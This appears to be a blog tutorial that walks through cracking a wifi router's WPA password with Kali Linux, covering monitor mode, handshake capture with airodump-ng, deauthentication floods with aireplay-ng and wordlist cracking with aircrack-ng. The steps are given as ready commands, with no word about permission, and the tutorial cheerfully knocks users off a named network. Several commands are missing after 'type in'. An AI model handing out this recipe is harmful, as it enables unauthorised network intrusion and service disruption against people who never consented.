A quick preview of what we’ll be doing:
- Checking if our wireless card supports monitor mode – the only way we can hack a wifi router like this is by sniffing traffic in monitor mode. If your wifi card doesn’t support monitor mode, you can’t hack the wifi using this method.
- Put Kali Linux in monitor mode – when we put our device in monitor mode, we can view traffic on that wifi network.
- Capture the handshake – when a computer or phone connects to a router, the devices establish a connection using a handshake. Capturing this handshake is essential to cracking the password.
- Crack the password – using a password list, we can use a brute force attack to test each password in the list against the wifi router.
Step 1: Check if your card supports monitor mode
Before we do anything, you need to make sure that your wifi adapter supports monitor mode. To do this, we can open up a terminal and type
As you can see, my wifi card has “monitor” listed under “Supported interface modes.” If your card doesn’t support monitor mode, you can buy a wifi adapter from amazon. We will need a wifi card that supports monitor mode for this tutorial
Step 2: Put Kali Linux in monitor mode and view traffic
Open up a terminal and type in
airmon-ng start wlan0
to put your computer in monitor mode. If Kali responds with any warnings, type in
airmon-ng check kill
to silence them. Keep in mind that you will kill your wifi connection when you put Kali in monitor mode.
We can check that we are in monitor mode by typing in
We see that wlan0mon is listed under our wifi devices.
To capture the traffic, type in
Step 3: Capture the traffic and find the handshake
In order to capture the handshake, we need to isolate the traffic on one router. We can do this by noting the BSSID of the router and the channel that it is communicating on. Type in
airodump-ng --bssid [BSSID of router] -c [channel of the router] --write [name of the file to write data to] wlan0mon
In this case, we’re going to try to find the password for router with SSID “mayhem.”
Next, we are going to capture the handshake by forcing people off of the network. When they reconnect, we can intercept the handshake.
To force people off the network, we are going to send a bunch of deauth packets, essentially DDOSing the network. To do this, type in
aireplay-ng --deauth 100 -a [BSSID of router] wlan0mon
This will send 100 deauthorization packets to the router, booting everyone off of it. Note that you can send as many deauth packets as you want. 100 should be enough for smaller networks though.
Once the people that we kicked off the network log back onto the network, we can capture the handshake, which will appear at the top of the traffic window.
Step 4: Crack the password
When we crack the password, we’re going to do a brute force attack. This means that we’re going to throw a bunch of passwords at the router and see if any of them connect. This is made much faster if we have a password list, and luckily Kali comes with a bunch of lists. We can navigate to /usr/share/wordlists to see the password lists we have.
cd /usr/share/wordlists ls
To run the password list against the router, type in
aircrack-ng [Name of file].cap -w /usr/share/wordlists/[path to password list to use]
If the password to the router is in the list, the program will crack it and you’ll be able to find the password.
If the password wasn’t found, that means that the password wasn’t in the list you provided. You can run another one that came with Kali Linux, or download a password list from the internet.
This GitHub repository has a lengthy list of them.
- We used Kali Linux to hack a wifi router (if you don’t have Kali Linux, you can buy it here).
- We used airmon, aireplay, and aircrack to find the wifi traffic and capture the handshake.
- Finally, we checked each password in a password list to see if the router had that password, eventually finding the password and hacking the wifi router.